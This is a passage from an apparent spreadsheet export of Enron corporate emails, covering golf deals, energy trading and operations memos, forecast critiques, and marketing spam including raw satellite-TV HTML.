consume! Join us for breakfast in our dining room, play golf, have lunch_x000D_
and then play golf again!  You can do all of this for only $35.00!!_x000D_
Remember, you also get your fountain drinks and range balls included_x000D_
as well.  Call (281) 343-9999 for a tee time and details!  Thursday is_x000D_
only $39.00 and  Friday is only $49.00 for the same deal._x000D_
_x000D_
****************************************************************************_x000D_
_x000D_
Atascocita_x000D_
_x000D_
Monday thru Thursday_x000D_
$40 before 11am_x000D_
$30 from 11 - 3pm_x000D_
$20 after 3pm_x000D_
_x000D_
Friday thru Sunday_x000D_
$50 before 11am_x000D_
$40 11- 2pm_x000D_
$30 2 - 4pm_x000D_
$25 after 4pm_x000D_
_x000D_
Check out http://www.golfboxx.com for details and coupons._x000D_
_x000D_
_x000D_
****************************************************************************_x000D_
_x000D_
Clear Lake_x000D_
_x000D_
FREE GREEN FEES_x000D_
Play for the Cart Fee Only!_x000D_
Any time Monday &amp; Tuesday_x000D_
not valid with any other offer_x000D_
not valid on holidays_x000D_
_x000D_
Play for $19 before noon_x000D_
and $15 after noon_x000D_
Wednesday - Friday_x000D_
prices include 1/2 cart_x000D_
not valid with any other offer_x000D_
not valid on holidays_x000D_
_x000D_
Saturday &amp; Sunday_x000D_
Play for $26 after 10 am_x000D_
prices include 1/2 cart_x000D_
not valid with any other offer_x000D_
not valid on holidays_x000D_
_x000D_
****************************************************************************_x000D_
_x000D_
Cinco Ranch_x000D_
_x000D_
Special Rates in August at Cinco Ranch_x000D_
*    Take advantage of our early tee times_x000D_
_x000D_
*    Play early and finish before it gets too hot!!!_x000D_
_x000D_
*    Special Rates for golf in August are_x000D_
     Monday thru Thursday    7:30 / 9:30am         $25_x000D_
     Monday thru Thursday    12:00 / 3:00pm        $20_x000D_
_x000D_
*    PARENTS TAKE NOTICE !!! Juniors Play FREE with Adult..._x000D_
     Monday thru Thursday from 12:00 / 3:00pm_x000D_
_x000D_
Call Cinco Ranch Golf Club at 281-395-4653 for your Tee Time Today !!!!_x000D_
Check out our coupons on http://www.golfboxx.com too!_x000D_
_x000D_
****************************************************************************_x000D_
_x000D_
Kingwood Cove Golf Club_x000D_
Have A Ball_x000D_
Mon-Thur  6am to 2pm_x000D_
$20.00_x000D_
Includes Green Fee &amp; Cart + Sleeve of Balls_x000D_
_x000D_
Kingwood Cove Golf Club_x000D_
Have A Ball_x000D_
Sat-Sun    11am to 3pm_x000D_
$25.00_x000D_
Includes Green Fee &amp; Cart + Sleeve of Balls_x000D_
_x000D_
****************************************************************************_x000D_
_x000D_
Thanks,_x000D_
_x000D_
The Golfboxx.com Team_x000D_
http://www.golfboxx.com</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 03:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.griffith@enron.com', 'john.disturnal@enron.com'})</t>
  </si>
  <si>
    <t>FX Daily Technical Analysis</t>
  </si>
  <si>
    <t>(See attached file: fxdta.pdf)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com_x000D_
 - fxdta.pdf</t>
  </si>
  <si>
    <t>Mon, 3 Apr 2000 10:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scot.chambers@enron.com'})</t>
  </si>
  <si>
    <t>St Peter, ILL (Ameren) O&amp;M Cost Estimate</t>
  </si>
  <si>
    <t>Ben, please find attached the preliminary cost estimate for full O&amp;M services _x000D_
provided at one greenfield, stand alone 2 x LM6000 PC Sprint simple cycle _x000D_
power project located at St Peter, Illinois. The project is assumed to be _x000D_
100% gas-fired and operating 1,600 hrs per year in the months of May through _x000D_
September. The staffing plan does not anticipate operations during the other _x000D_
months of the year. The tentative schedule is NTP 9/00 and COD 6/01. Ameren _x000D_
is to own and operate._x000D_
_x000D_
_x000D_
_x000D_
A couple of questions:_x000D_
1. Where is Ameren's headquarters located, i.e. the home office where their _x000D_
O&amp;M staff would get their admin, technical support?_x000D_
2. Who will own and operate the same plant that Spectrum is building 20 miles _x000D_
to the north of St Peter?_x000D_
_x000D_
Please review and call should you have questions or comments._x000D_
_x000D_
regards, Scot</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 05:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Docs</t>
  </si>
  <si>
    <t xml:space="preserve">Huh?_x000D_
_x000D_
_x000D_
From: Reagan Rorschach/ENRON@enronXgate on 06/07/2001 10:29 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Docs_x000D_
_x000D_
_x000D_
_x000D_
Reagan C. Rorschach_x000D_
Enron North America_x000D_
1400 Smith Street_x000D_
Houston, Texas 77002_x000D_
713.345.3363_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Sep 2001 05:39:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>NYISO - Software Release for September 25</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
market_relations@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
_x000D_
Dear Market Participants:_x000D_
_x000D_
The NYISO is pleased to inform you about the following enhancements to the_x000D_
NYISO web server, MIS, SPIDER, Real-Time system and AutoSys that will be_x000D_
implemented on September 25, 2001._x000D_
_x000D_
   A new pilot application will be deployed between the NYISO and ISO-New_x000D_
   England to help automate the exchange of inter-regional transaction_x000D_
   schedules.  Operations groups at both sites will receive automated_x000D_
   transfer of transaction data to facilitate the hourly transaction_x000D_
   checkout process._x000D_
_x000D_
   The NYISO web infrastructure will be enhanced through the implementation_x000D_
   of BEA's WebLogic product. The new application server will be the_x000D_
   platform utilized by the MIS to provide bidding and scheduling_x000D_
   capability to Internet customers. The new software replaces the_x000D_
   NetDynamics product, will provide the same functionality, and will be a_x000D_
   more robust and reliable development platform for future enhancements._x000D_
_x000D_
   New data postings will be made available on the web site to provide_x000D_
   real-time internal transmission limits and flows, as well as_x000D_
   transmission line scheduled and actual outages. This posting is part of_x000D_
   the collection of data requests made by the Business Issues Committee_x000D_
   (BIC) in September 2000._x000D_
_x000D_
   A new Upload / Download template will be created that will enable Market_x000D_
   Participants to get access to generator adjusted megawatt data (current_x000D_
   and historic billing data)._x000D_
_x000D_
If you any questions, please contact your Customer Relations Representative_x000D_
or call the Help Desk at (518) 356-6060._x000D_
_x000D_
Regards,_x000D_
_x000D_
Customer Relations_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 12:11:27 -0800 (PST)</t>
  </si>
  <si>
    <t>NFL Odds</t>
  </si>
  <si>
    <t>_x000D_
[IMAGE]	_x000D_
[IMAGE]	_x000D_
 PLEASE  VISIT OUR SPONSORS: 	_x000D_
Get a FREE SATELLITE TV SYSTEM with TWO FREE RECEIVERS and FREE INSTALLATION from DishNetwork.  You'll get up to 150 channels of CD quality sound and picture! Monthly rates start as low as $35.99. CLICK HERE.    	_x000D_
_x000D_
_x000D_
  Dear Jane Tholt,   NFL ODDS  Tomorrow  FAVORITE           OPEN     TODAY    O/U        UNDERDOG  Green Bay            7        6 1/2 (46 1/2 ) at Detroit Denver               8        6 1/2 (40)      at Dallas   Sunday  Baltimore            5        3     (34)      at Jacksonville Miami                5 1/2    5     (36)      at Buffalo at Tennessee        Pk        2     (34 1/2 ) Pittsburgh at Indianapolis      1 1/2    3     (52)      San Francisco at Kansas City      +1        1 1/2 (41)      Seattle at Philadelphia      9        8     (37 1/2 ) Washington Atlanta              3 1/2    3     (40)      at Carolina at Cleveland         6        6     (35 1/2 ) Cincinnati at New England      +3       Pk     (42)      New Orleans at San Diego         8        7     (43 1/2 ) Arizona Oakland              2 1/2    2 1/2 (39 1/2 ) at N.Y. Giants at Minnesota         3        3     (45)      Chicago   Monday  at St. Louis        10 1/2   10     (46)       Tampa Bay  	_x000D_
_x000D_
_x000D_
  ---COOL  NEW REMINDERS---Great Quotes of the DayTravel DigestPet Tips ---FAVORITE  REMINDERS---Entertainment NewsChildren's Product RecallsU.S. Market Indicies  Get helpful ideas and insights from other small business owners and entrepreneurs. Sign up for Advice for Small Business. CLICK HERE.   	_x000D_
_x000D_
_x000D_
To  unsubscribe from this Reminder topic, click  here.  _x000D_
To unsubscribe  from SmartReminders altogether, click  here.  _x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 04:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Meter 1459 - 8/00</t>
  </si>
  <si>
    <t xml:space="preserve">I rolled deal 331917._x000D_
_x000D_
_x000D_
Aimee Lannou   09/05/2000 11:04 AM_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc: Katherine Benedict/HOU/ECT@ECT _x000D_
Subject: Meter 1459 - 8/00_x000D_
_x000D_
Daren - can you get a deal set up for meter 1459 for 8/00?  The last deal _x000D_
number associated with this meter is 331917 for July 00. Counterparty - GSF _x000D_
Energy, LLC. Let me know if you have any questions._x000D_
_x000D_
AL_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 05:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Central Power &amp; Light</t>
  </si>
  <si>
    <t xml:space="preserve">Gary, _x000D_
_x000D_
Do you have any record of this?_x000D_
_x000D_
D_x000D_
---------------------- Forwarded by Daren J Farmer/HOU/ECT on 03/21/2001 _x000D_
01:20 PM ---------------------------_x000D_
Aimee Lannou   03/20/2001 01:38 PM_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc: Juliann Kemp/ENRON@enronXgate, Rebecca Griffin/NA/Enron@Enron _x000D_
Subject: Central Power &amp; Light_x000D_
_x000D_
Daren - was there a deal for 5.000 at CP&amp;L on Feb. 21?  CP&amp;L shows 5.000, but _x000D_
I have looked in MOPS and there is not a deal.  Can you verify whether or not _x000D_
there was a deal for that day?  Thanks._x000D_
_x000D_
Aimee_x000D_
_x000D_
---------------------- Forwarded by Aimee Lannou/HOU/ECT on 03/20/2001 01:39 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Rebecca Griffin@ENRON_x000D_
03/20/2001 01:18 PM_x000D_
To: Aimee Lannou/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Central Power &amp; Light_x000D_
_x000D_
Aimee,_x000D_
_x000D_
I received a call from CP&amp;L about the February 2001 production invoice.  They _x000D_
are showing 5,000 mmbtu on February 21 for HPL.  We are not showing anything _x000D_
for HPL on that day.  Could you verify if this is correct?_x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Rebecca_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 21:39:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>United Parcel Service (UPS) Letter Centers Now Open</t>
  </si>
  <si>
    <t>As part of the recently negotiated agreement with United Parcel Service (UPS), Enron employees may now utilize two new letter centers when sending packages after hours.  These letter centers are located in Three Allen Center, on the ground level, behind the down escalator, near the U.S. Postal Services self-service area and in the Enron Building, at the back of the escalators near the automated teller machine.  _x000D_
_x000D_
Letter-sized envelopes, as well as boxes up to 18"x 13" x 3" can be shipped via Next-Day Air, Second-Day Air, Third-Day Select, UPS International and UPS World-Wide Express Service.  _x000D_
_x000D_
In order to eliminate service disruptions, please apply a completed label to the envelope or box, in accordance with previously communicated shipping instructions.  When utilizing the shipping documentation available at the letter center, please include the Enron account number and your company code and cost center in the reference fields.  _x000D_
_x000D_
Pick up times at the letter centers are 7:45 p.m. for Three Allen Center and 8:00 p.m. for the Enron Building, Monday through Friday._x000D_
_x000D_
If you have any questions, please feel free to contact Glenn Lewis, Global Strategic Sourcing contract manager at 713-646-7512.</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 05:33:07 -0800 (PST)</t>
  </si>
  <si>
    <t>good morning</t>
  </si>
  <si>
    <t>I tried calling but noone picked up the phone.  Anyway, I just wanted to ch=_x000D_
eck and make sure you don't have any questions about running keystone and s=_x000D_
ocal.  Generally, I put them out there initially with a 2 cent two way unti=_x000D_
l the market gets moving a bit and then tighten keystone up to 1 or 1.5 cen=_x000D_
ts.  All the products should be set to offset to last trade(usually a penny=_x000D_
).  Then I just adjust the offset depending on how fast I think the market =_x000D_
is moving.  The market tends to get really slow by 9:15, so by then, I'm ba=_x000D_
ck to a 2 cent two-way at keystone and a 3 cent two-way at the border.  The=_x000D_
se markets will still be tighter than ICE.  Also just a reminder, we have 8=_x000D_
000 of the Waha gas to sell to the Texas desk.  All transport should be in =_x000D_
position already.  Jason may talk to you about moving some of his transport=_x000D_
 out of Keystone, but not likely.  I would expect that we would probably wa=_x000D_
nt to go about 50,000 long for tuesday and then wednesday.  Check with Patt=_x000D_
i regarding the injection capacity since Socal raised it this weekend and t=_x000D_
here may be other changes to the schedule.  I'm available for any questions=_x000D_
 on my cell phone...832-444-7702.=20_x000D_
=20_x000D_
Have fun,_x000D_
=20_x000D_
Mat</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 09:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'avivar@cinergy.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the summary of the financial information._x000D_
Ben_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 04:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'wade.cline@enron.com'})</t>
  </si>
  <si>
    <t>Clickpaper.com - Indian legal issues</t>
  </si>
  <si>
    <t xml:space="preserve">Wade:_x000D_
_x000D_
I hope things are going well for you.  It was good to see you the other day.  _x000D_
I'm not even sure where you are right now, but I imagine that you are _x000D_
checking your e-mail, wherever you are.  I was hoping you could give us a _x000D_
little guidance on tracking down some Indian legal issues -- perhaps a _x000D_
reference to someone that could assist us._x000D_
_x000D_
Clickpaper.com is Enron's electronic  trading marketplace for pulp, paper and _x000D_
lumber products (including derivative products).  It is modeled after _x000D_
EnronOnline, but specializes in these commodities.  The team is in the _x000D_
process of registering customers around the world to access and trade on the _x000D_
Clickpaper website;  in keeping with the EOL business model, Clickpaper _x000D_
enters into access and trading agreements with every customer that govern _x000D_
their use of and trading on the site._x000D_
_x000D_
Those access and trading agreements are "jurisdiction specific" -- customized _x000D_
for the particular country in which the customer accessing the site is based _x000D_
-- in order to deal with jurisdiction-specific legal issues associated with _x000D_
accessing, or contracting via, the internet, financial trading, regulatory _x000D_
issues, etc.   _x000D_
_x000D_
The team has identified India as having a large number of potential _x000D_
customers, and is attending a trade show in New Delhi in early December, and _x000D_
they would like to be able to sign customers up at that trade show, or at the _x000D_
very least arrange to give them access to the site.  We therefore need to _x000D_
consult with legal counsel in India to identify any issues and prepare an _x000D_
apporpriate access and trading agreement.  EnronOnline has developed a due _x000D_
diligence checklist which is very helpful in describing our business model _x000D_
and raising specific legal issues that we are likely to encounter._x000D_
_x000D_
Could you refer me to in-house counsel or an outside firm that could assist _x000D_
us with this project on an expedited basis (isn't that always the case _x000D_
here)?  I would really appreciate any help you could give to us._x000D_
_x000D_
To the other  recipients of this message  -- I know that there are several _x000D_
people working on this project -- if you already have this project underway, _x000D_
please let Wade and I know so we aren't duplicating  your efforts.  Thanks. _x000D_
_x000D_
        _x000D_
 _x000D_
_x000D_
Travis McCullough_x000D_
Enron North America Corp._x000D_
1400 Smith Street EB 3817_x000D_
Houston Texas 77002_x000D_
Phone:  (713) 853-1575_x000D_
Fax: (713) 646-3490      </t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 07:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jhh1@email.msn.com'})</t>
  </si>
  <si>
    <t>Re: See page 1</t>
  </si>
  <si>
    <t xml:space="preserve">John,_x000D_
_x000D_
Thanks._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"John H Herbert" &lt;jhh1@email.msn.com&gt; on 07/14/2000 11:00:18 AM_x000D_
To: "Vince J Kaminski" &lt;Vince_J_Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: See page 1_x000D_
_x000D_
_x000D_
Best regards,_x000D_
_x000D_
_x000D_
JHHerbert_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - gd.pdf_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 01:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.goodpasture@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Re: Presentation slides</t>
  </si>
  <si>
    <t xml:space="preserve">Hi  John and Vince   I had an opportunity to review the slide  presentation _x000D_
of  EP   and  here is my_x000D_
assessment.  Bottom  line:   Too  robust by 2005  on merchant plants  being _x000D_
built; up and running  baseload  and_x000D_
too optimistic  about offshore   gas volume   growth by 2005  as well._x000D_
_x000D_
WESTERN MARKETS_x000D_
EP forecast  is  way too high  by  2005 by their assuming 1.4 BCFD of new _x000D_
power generation gas  demand_x000D_
could be in place in the  west  in such a short  time..This means ..they may _x000D_
be  forgetting to consider  the tough_x000D_
 NIMBY   siting  hurdles  that stalled  all  but  550 MW  of the  current   _x000D_
10,000 mw of planned  capacity  in the  West.....EP is  assuming not  only  _x000D_
do  80 percent of  these planned plants  get  built  but then they l run  _x000D_
baseload...which is_x000D_
very unlikely. Most  shall be   peaking  or intermediate load in the start _x000D_
years  which trims that gas use by 50 to 85 percent._x000D_
WEFA  and   ENE Corp. thinks  the  area gas use growth will be   more like  _x000D_
3.2/  2.9 BCFD  BY 2010 --  but 80 percent of  this  gas  use  happening  _x000D_
late -- not early -- in the time period out  to   2010.  I foresee  the EP _x000D_
scenario as unrealistic given NIMBY and enviro siting limitations short term _x000D_
in the West. _x000D_
_x000D_
WEST  SO CENTRAL  TX/LA  _x000D_
_x000D_
EP  sees the  area  at   2.7 bcfd  by 2005;   way too high  compared  to  _x000D_
WEFA  and  ENE   at   -400 mmcfd  and  +500 mmcfd, respectively BY 2010   _x000D_
and  even  prematurely  high by PIRA's  robust   standard  of   3.5 bcfd  by _x000D_
2010 ._x000D_
EP  like PIRA assumes   the  gas thermal demand  stays on even  as merchant  _x000D_
plants  get  built;  ENE and_x000D_
WEFA  assume  merchant  kwhs and lower variable costs and better heat  rates  _x000D_
shut in the thermals or  cause them to be  repowered  as combined cycles.  _x000D_
Given where EP's  pipes  are located in the  West  and Texas  and up the _x000D_
Northeast  this  demand scenario  fits  their wants...so I can see why they _x000D_
like  this scenario  but   it assumes power generators  will not  act  _x000D_
economically rationally._x000D_
_x000D_
NORTHEAST_x000D_
EP sees  2.7 bcfd  by 2005  vs WEFA, PIRA and  ENE   seeing   2.3/2.5/2..6  _x000D_
bcfd  by 2010 .Way premature  for this area to  see such growth  as  385 _x000D_
mmcfd  annually.  They  are real robust on  offshore  gas  being there  to  _x000D_
fill this need too._x000D_
_x000D_
GAS  SUPPLY_x000D_
Offshore  supply, which  has  fallen   2.4    bcfd   since    1995   is _x000D_
expected  to  grow in EP's  forecast  by  3.6  bcfd  by 2005...extremely   _x000D_
unlikely  given the slow  start  Shell  and  Texaco and Exxon offshore   has  _x000D_
been  showing  us so far.  I was  burned  in  my  supply analysis  work in  _x000D_
1999  by Shell's  forecasts of their   adding  alone   2  bcfd  to  offshore  _x000D_
deliverability  by  2000  which never  happened --  it fell  500mmcfd  _x000D_
instead !!  so  I do not   give  a lot of  hope right now   for 3.6 bcfd _x000D_
incremental  gas  by 2005  per  EP.  Cambridge  Energy  says  if all goes  _x000D_
well  the Offshore  overall  will be up  1.1- 1.7  bcfd  by  2005..way less  _x000D_
than  EP  is showing._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 10:05:26 -0800 (PST)</t>
  </si>
  <si>
    <t>OBA</t>
  </si>
  <si>
    <t xml:space="preserve">Michelle,_x000D_
_x000D_
	Attached is a red-lined version of the Burlington OBA, which reflects the change that we discussed this morning. Please let me know if you have any comments or additional thoughts. Thanks._x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 23 Nov 2001 13:17:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'irene@m-ul.com'})</t>
  </si>
  <si>
    <t>FREE Satellite TV!!</t>
  </si>
  <si>
    <t>_x000D_
&lt;html&gt;_x000D_
&lt;head&gt;_x000D_
_x000D_
&lt;title&gt;Untitled Document&lt;/title&gt;_x000D_
&lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;_x000D_
_x000D_
&lt;/head&gt;_x000D_
&lt;body bgcolor="#FFFFFF""&gt;&lt;center&gt;_x000D_
&lt;table width="540" border="1" cellspacing="0" cellpadding="3" bordercolor="#999999"&gt;_x000D_
 &lt;tr bgcolor="#0099FF"&gt;_x000D_
 &lt;td bgcolor="#FFFFFF" height="48"&gt;_x000D_
 &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;If_x000D_
 you do not wish to receive email from Bargain Bazaar, please Click Here:&lt;br&gt;_x000D_
 &lt;a href="http://www.m-ul.com/e/unsub.cgi?l=9996&amp;m=1736394363"&gt;UNSUBSCRIBE&lt;/a&gt; &lt;/font&gt;&lt;/div&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
&lt;br&gt;_x000D_
&lt;table width="640" border="0" cellspacing="5" cellpadding="0" bgcolor="#CCCCCC"&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td colspan="2" bgcolor="#FFFFFF"&gt;_x000D_
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td colspan="2" align="center" valign="top"&gt;&lt;img src="http://www.m-ul.com/email/images/accessories/Daily_Deal_banner.gif" width="640" height="70"&gt;&lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td colspan="2" valign="top" align="left"&gt;_x000D_
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="5"&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td align="center" width="33%"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font face="Times New Roman, Times, serif" size="1"&gt;Volume_x000D_
 No. 42&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;_x000D_
 &lt;td colspan="2" align="center"&gt;&lt;font face="Times New Roman, Times, serif" size="1"&gt;Thursday,_x000D_
 November 22, 2001&lt;/font&gt;&lt;/td&gt;_x000D_
 &lt;td align="center" width="33%"&gt;&lt;font face="Times New Roman, Times, serif" size="1"&gt;Price:_x000D_
 &lt;i&gt;&lt;font color="#FF0000"&gt;FREE&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="5"&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td colspan="3"&gt;_x000D_
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="5" height="400"&gt;_x000D_
 &lt;tr align="center"&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;table border="1" cellpadding="0" cellspacing="0" width="600"&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td bgcolor="#EFEFEF"&gt;_x000D_
 &lt;p align="CENTER"&gt;&lt;a href="http://www.m-ul.com/e/c.cgi?j=20011122_70&amp;e=1736394363&amp;r=u251&amp;d=6&amp;p=1"&gt;&lt;img_x000D_
 src="http://www.m-ul.com/email/images/html082001/Anim-2-rcvr.gif" border="0" width="400" height="167"&gt;&lt;/a&gt;&lt;/p&gt;_x000D_
 &lt;p align="CENTER"&gt;&lt;font face="Arial" color="#FF0000"&gt;&lt;strong&gt;What's_x000D_
 The Deal??&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;p align="CENTER"&gt;&lt;strong&gt;&lt;font face="Arial"&gt;&lt;small&gt;&lt;font color="#FF0000"&gt;FREE&lt;/font&gt;_x000D_
 SATELLITE TV SYSTEM FROM MYDISHNOW.COM&lt;/small&gt;&lt;br&gt;_x000D_
 &lt;small&gt;AN AUTHORIZED INDEPENDENT RETAILER OF_x000D_
 DISH NETWORK,&lt;br&gt;_x000D_
 &lt;small&gt;ONE OF THE LEADING PROVIDERS OF SATELLITE_x000D_
 TV DISH TECHNOLOGY&lt;/small&gt;&lt;/small&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;_x000D_
 &lt;p align="CENTER"&gt;&lt;strong&gt;&lt;font face="Arial"&gt;&lt;small&gt;THE_x000D_
 SYSTEM COSTS YOU &lt;font_x000D_
 color="#FF0000"&gt;ZERO!&lt;/font&gt;&amp;nbsp;&lt;br&gt;_x000D_
 THAT'S RIGHT:&lt;br&gt;_x000D_
 &lt;font color="#FF0000"&gt;FREE&lt;/font&gt; EQUIPMENT;_x000D_
 &lt;font color="#FF0000"&gt;FREE&lt;/font&gt; INSTALLATION;_x000D_
 &lt;/small&gt;&lt;br&gt;_x000D_
 &lt;small&gt;&lt;font color="#FF0000"&gt;FREE&lt;/font&gt; 1st_x000D_
 MONTH of SERVICE; &lt;/small&gt;&lt;/font&gt;&lt;font_x000D_
 face="Arial" size="2" color="#FF0000"&gt;FREE&lt;/font&gt;&lt;font face="Arial" size="2"_x000D_
 color="#000080"&gt; Shipping and Handling!!&lt;br&gt;_x000D_
 (That's a LOT of FREE!!)&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;_x000D_
 &lt;p align="CENTER"&gt;&lt;font face="Arial" size="2" color="#000080"&gt;&lt;strong&gt;IF_x000D_
 YOU ORDER NOW, HERE'S WHAT YOU RECEIVE:&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;div align="center"&gt;_x000D_
 &lt;center&gt;_x000D_
 &lt;table border="0" cellpadding="0" cellspacing="0"&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;ul&gt;_x000D_
 &lt;li&gt;_x000D_
 &lt;p align="left"&gt;&lt;font face="Arial" size="2" color="#000080"&gt;&lt;strong&gt;The_x000D_
 Dish 500 Digital Satellite TV_x000D_
 System&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;/li&gt;_x000D_
 &lt;li&gt;_x000D_
 &lt;p align="left"&gt;&lt;strong&gt;&lt;font face="Arial" color="#ff0000" size="2"&gt;FREE&lt;/font&gt;&lt;font_x000D_
 face="Arial" size="2" color="#000080"&gt; 2nd Receiver for another TV_x000D_
 in your house&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;_x000D_
 &lt;/li&gt;_x000D_
 &lt;li&gt;_x000D_
 &lt;p align="left"&gt;&lt;font face="Arial" size="2" color="#000080"&gt;&lt;strong&gt;Password_x000D_
 Protection for Parental Control_x000D_
 Lockout&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;/li&gt;_x000D_
 &lt;/ul&gt;_x000D_
 &lt;ul&gt;_x000D_
 &lt;li&gt;_x000D_
 &lt;p align="left"&gt;&lt;strong&gt;&lt;font face="Arial" color="#ff0000" size="2"&gt;FREE&lt;/font&gt;&lt;font_x000D_
 face="Arial" size="2" color="#000080"&gt; Basic Professional Installation_x000D_
 by a Professional Technician&lt;br&gt;_x000D_
 Anywhere in the USA (except Alaska_x000D_
 or Hawaii)&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;_x000D_
 &lt;/li&gt;_x000D_
 &lt;li&gt;_x000D_
 &lt;p align="left"&gt;&lt;font face="Arial" size="2" color="#000080"&gt;&lt;strong&gt;Access_x000D_
 up to 500 channels&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;/li&gt;_x000D_
 &lt;li&gt;_x000D_
 &lt;p align="left"&gt;&lt;font face="Arial" size="2" color="#000080"&gt;&lt;strong&gt;100%_x000D_
 Digital Programming&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;/li&gt;_x000D_
 &lt;li&gt;_x000D_
 &lt;p align="left"&gt;&lt;strong&gt;&lt;font face="Arial" color="#ff0000" size="2"&gt;FREE&lt;/font&gt;&lt;font_x000D_
 face="Arial" size="2" color="#000080"&gt; In Home Warranty Service Plan&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;_x000D_
 &lt;/li&gt;_x000D_
 &lt;li&gt;_x000D_
 &lt;p align="left"&gt;&lt;font face="Arial" size="2" color="#000080"&gt;&lt;strong&gt;Major_x000D_
 local networks (NBC, ABC, CBS,_x000D_
 FOX, PBS)&lt;br&gt;_x000D_
 are available in most major cities&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;_x000D_
 &lt;/li&gt;_x000D_
 &lt;/ul&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/center&gt;_x000D_
 &lt;/div&gt;_x000D_
